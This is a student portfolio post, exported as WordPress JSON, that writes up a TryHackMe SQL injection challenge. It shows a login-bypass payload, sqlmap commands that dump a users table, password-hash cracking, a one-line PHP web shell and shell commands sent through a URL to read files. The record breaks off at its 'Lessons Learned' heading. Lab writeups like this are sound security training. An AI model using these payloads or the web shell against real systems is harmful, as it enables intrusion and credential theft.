{"id":18,"date":"2026-05-03T18:20:02","date_gmt":"2026-05-03T18:20:02","guid":{"rendered":"https:\/\/student.wp.odu.edu\/pdamt001\/?p=18"},"modified":"2026-05-03T18:20:06","modified_gmt":"2026-05-03T18:20:06","slug":"skill-3-ethical-hacking-penetration-testing","status":"publish","type":"post","link":"https:\/\/student.wp.odu.edu\/pdamt001\/2026\/05\/03\/skill-3-ethical-hacking-penetration-testing\/","title":{"rendered":"SKILL 3: ETHICAL HACKING & PENETRATION TESTING"},"content":{"rendered":"\n
\n\n\n\n

Artifact 7 \u2014 CTF Writeup: Web Exploitation Challenge<\/h2>\n\n\n\n

Platform:<\/strong> TryHackMe Challenge Type:<\/strong> Web Exploitation \/ SQL Injection Difficulty:<\/strong> Medium Date:<\/strong> Summer 2024<\/p>\n\n\n\n

Overview<\/h3>\n\n\n\n

This writeup documents my approach to a web exploitation challenge involving SQL injection and privilege escalation. The challenge required identifying a vulnerability in a login form, exploiting it to access a database, and using retrieved credentials to gain administrative access to the application.<\/p>\n\n\n\n

Reconnaissance<\/h3>\n\n\n\n

I began by navigating to the challenge URL and examining the login page. Using browser developer tools, I inspected the page source and identified that the login form submitted a POST request to \/login.php<\/code> with parameters username<\/code> and password<\/code>.<\/p>\n\n\n\n

I then ran a basic Nmap scan to identify open ports and services:<\/p>\n\n\n\n

nmap -sV -p 80,443,8080 <target_ip><\/code><\/pre>\n\n\n\n
Results showed port 80 open running Apache 2.4.29 on Ubuntu. No other relevant ports were open.<\/p>\n\n\n\n
Identifying the Vulnerability<\/h3>\n\n\n\n
I tested the login form with a basic SQL injection payload:<\/p>\n\n\n\n
Username: admin' --\nPassword: anything<\/code><\/pre>\n\n\n\n
The application returned a successful login response, confirming that the login form was vulnerable to SQL injection. The --<\/code> comment sequence was causing the password check to be ignored entirely.<\/p>\n\n\n\n
Exploitation<\/h3>\n\n\n\n
Using sqlmap<\/code> to automate further SQL injection testing:<\/p>\n\n\n\n
sqlmap -u \"http:\/\/<target>\/login.php\" --data=\"username=admin&password=test\" --dbs<\/code><\/pre>\n\n\n\n
This returned the database names present on the server. I then enumerated the tables in the target database:<\/p>\n\n\n\n
sqlmap -u \"http:\/\/<target>\/login.php\" --data=\"username=admin&password=test\" -D targetdb --tables<\/code><\/pre>\n\n\n\n
The users<\/code> table was identified. Dumping its contents:<\/p>\n\n\n\n
sqlmap -u \"http:\/\/<target>\/login.php\" --data=\"username=admin&password=test\" -D targetdb -T users --dump<\/code><\/pre>\n\n\n\n
This returned a table containing usernames and hashed passwords. The admin hash was cracked using a wordlist attack with John the Ripper, yielding the plaintext password.<\/p>\n\n\n\n
Privilege Escalation<\/h3>\n\n\n\n
Logging in with the admin credentials revealed an administrative panel with file upload functionality. I tested whether the file upload validated file types by uploading a PHP web shell:<\/p>\n\n\n\n
php<\/p>\n\n\n\n
<?php<\/strong> system($_GET['cmd']); ?><\/strong><\/code><\/pre>\n\n\n\n
The upload was accepted. Navigating to the uploaded file’s URL and passing a command:<\/p>\n\n\n\n
http://<target>\/uploads\/shell.php?cmd=id<\/code><\/pre>\n\n\n\n
Returned: uid=33(www-data)<\/code>. I now had remote code execution on the server.<\/p>\n\n\n\n
Flag Retrieval<\/h3>\n\n\n\n
Using the web shell to navigate the file system, I located the flag file at \/home\/admin\/flag.txt<\/code> and retrieved it using:<\/p>\n\n\n\n
http://<target>\/uploads\/shell.php?cmd=cat+\/home\/admin\/flag.txt<\/code><\/pre>\n\n\n\n
Lessons Learned<\/h3>\n\n\n\n
This challenge reinforced several important principles:<\/p>\n\n\n\n